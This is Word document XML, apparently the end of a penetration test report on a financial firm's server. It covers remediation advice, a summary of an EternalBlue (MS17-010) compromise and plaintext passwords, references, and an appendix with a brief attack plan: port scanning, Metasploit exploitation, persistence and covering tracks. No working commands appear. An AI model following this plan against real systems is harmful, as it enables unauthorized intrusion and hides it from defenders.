          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Deploy a centralized log management system (such as SIEM) to uniformly collect, correlate and analyze all logs, and issue real-time alerts to detect suspicious activities in a timely manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177E984E" w14:textId="77777777" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Regular safety practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1463B77E" w14:textId="77777777" w:rsidR="009F3ECC" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Conduct a comprehensive and authenticated internal network vulnerability scan at least once every quarter to proactively identif</w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>y new security vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EFB5E5" w14:textId="77777777" w:rsidR="009F3ECC" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Conduct at least one penetration test carried out by a third party each year to verify the effectiveness </w:t>
      </w:r>
      <w:r w:rsidR="00773C52" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>of the existing defense system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA59D28" w14:textId="54F91AEA" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="009F3ECC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Maintain reliable data backups and conduct regular recovery drills to ensure that business operations can be quickly restored in the event of destructive attacks such as ransomware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B09E8" w14:textId="77777777" w:rsidR="00773C52" w:rsidRPr="0022306B" w:rsidRDefault="00773C52" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B07E539" w14:textId="490043EA" w:rsidR="001B69E9" w:rsidRPr="0022306B" w:rsidRDefault="00221F7C" w:rsidP="00221F7C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. S</w:t>
      </w:r>
      <w:r w:rsidR="001B69E9" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ummary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F16A50" w14:textId="54FF6A94" w:rsidR="001B69E9"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This penetration test on the </w:t>
      </w:r>
      <w:r w:rsidR="007742B2" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cobalt Harbor Financial</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> server (192.168.4.20) successfully revealed an extremely serious security vulnerability - MS17-010 "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>". This vulnerability enable</w:t>
      </w:r>
      <w:r w:rsidR="00CD3804" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> our testing team to remotely gain full administrative control over the server without any authentication. This fatal flaw, combined with the plaintext password storage problem we discovered within the system, clearly indicates that the company is currently facing a huge risk of data leakage and system paralysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A07767" w14:textId="77777777" w:rsidR="00CD3804" w:rsidRPr="0022306B" w:rsidRDefault="00CD3804" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70885826" w14:textId="1048F33D" w:rsidR="00E55CC7" w:rsidRPr="0022306B" w:rsidRDefault="001B69E9" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidR="00F467DB" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>successfully</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> simulated attack has sounded the alarm for us, highlighting the extreme importance of timely patch management and phasing out</w:t>
      </w:r>
      <w:r w:rsidR="00CD3804" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> outdated protocols. We firmly believe that </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>as long as</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007742B2" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Cobalt Harbor Financial</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> takes the findings in this report seriously and systematically implements the short-term and long-term remediation suggestions we have proposed, your company's overall cybersecurity defense capabilities will be qualitatively enhanced, thereby more effectively resisting increasingly complex cyber threats in the future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A84CD" w14:textId="77777777" w:rsidR="00263553" w:rsidRPr="0022306B" w:rsidRDefault="00263553" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516BC27A" w14:textId="11C902D2" w:rsidR="00B168AC" w:rsidRPr="0022306B" w:rsidRDefault="00B168AC" w:rsidP="00221F7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">References: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0CD74F" w14:textId="30724E75" w:rsidR="007C32C0" w:rsidRPr="0022306B" w:rsidRDefault="007C32C0" w:rsidP="007C32C0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>National Institute of Standards and Technology (NIST).</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2017, March 16th). </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CVE-2017-0144</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>. National Vulnerability Database. https://nvd.nist.gov/vuln/detail/CVE-2017-0144</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3802735F" w14:textId="31A8D442" w:rsidR="00146C3F" w:rsidRPr="0022306B" w:rsidRDefault="00146C3F" w:rsidP="007C32C0">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Porup,</w:t>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>J.M</w:t>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (202</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00DE2745" w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, July 19th).</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:spacing w:val="-7"/>
          <w:kern w:val="36"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> explained: How this password cracker works. </w:t>
      </w:r>
      <w:r w:rsidR="007C32C0" w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>CSO Online</w:t>
      </w:r>
      <w:r w:rsidR="00B168AC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://www.csoonline.com/article/569355/hashcat-explained-why-you-might-need-this-password-cracker.html</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B26E0B2" w14:textId="4599730A" w:rsidR="00CD3804" w:rsidRPr="0022306B" w:rsidRDefault="007C32C0" w:rsidP="00DE2745">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Shivanandhan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>, M</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (2022, November 17). </w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">How to crack passwords using John the Ripper – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Pentesting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> tutorial</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>freeCodeCamp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B168AC" w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> https://www.freecodecamp.org/news/crack-passwords-using-john-the-ripper-pentesting-tutorial/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E5AC86" w14:textId="5B755627" w:rsidR="00CD3804" w:rsidRPr="0022306B" w:rsidRDefault="00CD3804" w:rsidP="00221F7C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>APPENDIX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33EB4EAB" w14:textId="77777777" w:rsidR="00CD3804" w:rsidRPr="0022306B" w:rsidRDefault="00CD3804" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8BB010" w14:textId="41C4AE31" w:rsidR="00CD3804" w:rsidRPr="0022306B" w:rsidRDefault="00CD3804" w:rsidP="001B69E9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Rough attack plan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6A52D7" w14:textId="6F8BBE58" w:rsidR="00CD3804" w:rsidRPr="0022306B" w:rsidRDefault="00CD3804" w:rsidP="00CD3804">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan the ports and look up what ports may indicate vulnerabilities relevant to this version of windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FA5BA5" w14:textId="6A94378D" w:rsidR="00CD3804" w:rsidRPr="0022306B" w:rsidRDefault="00CD3804" w:rsidP="00CD3804">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Match attacks from Metasploit to these vulnerabilities to create options for exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B0AAE" w14:textId="0D13C24F" w:rsidR="00CD3804" w:rsidRPr="0022306B" w:rsidRDefault="00CD3804" w:rsidP="00CD3804">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Look at Metasploit’s kit and other kits for gaining persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DC45D" w14:textId="380AF0F9" w:rsidR="00CD3804" w:rsidRPr="0022306B" w:rsidRDefault="00CD3804" w:rsidP="00CD3804">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022306B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at all the tools used and ways to cover our tracks </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00CD3804" w:rsidRPr="0022306B">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BBF9F" w14:textId="77777777" w:rsidR="00E627D3" w:rsidRDefault="00E627D3" w:rsidP="000E19BF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B21AE60" w14:textId="77777777" w:rsidR="00E627D3" w:rsidRDefault="00E627D3" w:rsidP="000E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558E4" w14:textId="77777777" w:rsidR="00E627D3" w:rsidRDefault="00E627D3" w:rsidP="000E19BF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5272A8BA" w14:textId="77777777" w:rsidR="00E627D3" w:rsidRDefault="00E627D3" w:rsidP="000E1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556064"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="3DC653B9" w14:textId="5AC03CF2" w:rsidR="000E19BF" w:rsidRDefault="000E19BF">
        <w:pPr>
          <w:pStyle w:val="Header"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="75B64759" w14:textId="77777777" w:rsidR="000E19BF" w:rsidRDefault="000E1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CCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C2F26200"/>
    <w:lvl w:ilvl="0" w:tplc="1409000F">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3C35716"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42D07F88"/>
    <w:lvl w:ilvl="0" w:tplc="6DEA4206">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
